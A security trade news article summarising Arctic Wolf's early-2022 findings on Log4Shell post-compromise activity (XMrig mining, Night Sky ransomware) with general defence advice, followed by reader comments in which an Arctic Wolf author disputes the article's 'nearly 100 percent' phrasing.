Log4Shell Vulnerability Analysis: Arctic Wolf Findings Offer MSP, MSSP Security Guidance

Nearly 100 percent Log4Shell vulnerability CVE-2021-44228 post-compromise behaviors have been linked to attempted installation of the XMrig cryptocurrency miner and Night Sky ransomware campaigns associated with the Aquatic Panda threat actor, according to an analysis of more than 2,300 Arctic Wolf  customers performed in January 2022.

The presence of XMrig indicates that a cybercriminal can exploit Log4Shell to deploy unauthorized applications in an end-user’s environment, Arctic Wolf noted. This represents a “much higher severity threat” than a potentially unwanted application (PUA), which is how XMrig is commonly classified.

Comparatively, Arctic Wolf detected a Night Sky payload and associated activity via observations based on attempted PowerShell use and various indicators of compromise (IOCs), the company indicated. It found Night Sky IOCs across eight customers.

Other notable findings from Arctic Wolf’s Log4Shell analysis included:

  • 29,338 unique incidents of adversarial scanning for Log4Shell were discovered as of Jan. 25, 2022, all of which were focused on 807 customers.
  • Less than 2.5 percent less of customers were still susceptible to Log4Shell exploits.
  • There was a successful remote code execution in 252 incidents.

How to Protect Against Log4Shell

Strong security practices play a key role in being able to mitigate Log4Shell exploits and other evolving threats and risks before an organization’s IT infrastructure is compromised, Arctic Wolf stated. With a “defense-in-depth approach,” an organization can guard against such issues.

Furthermore, an organization must explore ways to continuously improve its security posture, Arctic Wolf said. It also must use a combination of human expertise and technology to protect against cyberattacks now and in the future.

Meanwhile, many third-party scanner tools are available to help MSSPs and MSPs combat Log4Shell. Some of these tools focus exclusively on threat identification, detection, remediation and reporting.

Return Home



    Olivia L.:

    You are seriously positioning Arctic Wolf as an expert – a company who started out with homegrown sub-par endpoint and SIEM solutions with very mediocre customer satisfaction? Nearly 100% of their 2300 customers Log4Shell have been linked to attempted installation of the XMrig cryptocurrency miner and Night Sky ransomware campaigns associated with the Aquatic Panda threat actor? I would be curious to know how quickly Arctic Wolf was able to detect the anomalous behavior and what documented proactive actions were taken that is unique.
    Perhaps you should reconsider using them as future sources.

    Ian McShane:

    Hi Olivia – thanks for reading and commenting. My name is Ian McShane, I work at Arctic Wolf and I was the author of the blog that this article references. It is available here if you care to take a read: https://arcticwolf.com/resources/blog/log4shell-in-the-field-brief-analysis-through-january-2022

    I wanted to offer a few clarifying points.

    At no point did we claim that “nearly 100%” of our 2,300 customers were linked to this. As a matter of fact, less than 2.5% of our customers saw anything more than opportunistic scanning – this is also noted in this article 🙂

    As for how we can detect the behavior – well we have our network sensor that is able to analyse north/south and east/west net flow so we can see and detect the activity that way, as well as many integrations with security products that generate event data sources, on-device security, OS logging, and more.

    I hope that helps, and please do get in touch if it doesn’t. I’m happy to talk live at anytime.


Leave a Reply

Your email address will not be published.